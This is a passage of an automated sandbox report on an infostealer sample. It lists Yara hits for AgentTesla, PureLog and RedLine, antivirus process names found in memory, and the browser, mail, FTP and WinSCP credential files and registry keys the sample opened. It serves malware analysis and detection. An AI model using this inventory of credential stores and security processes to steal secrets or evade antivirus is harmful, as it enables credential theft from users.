Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_029891C8 GetLocalTime,

19_2_029891C8

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_0298B748 GetVersionExA,

19_2_0298B748

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Yara detected Credential Stealer

Source: Yara match	File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
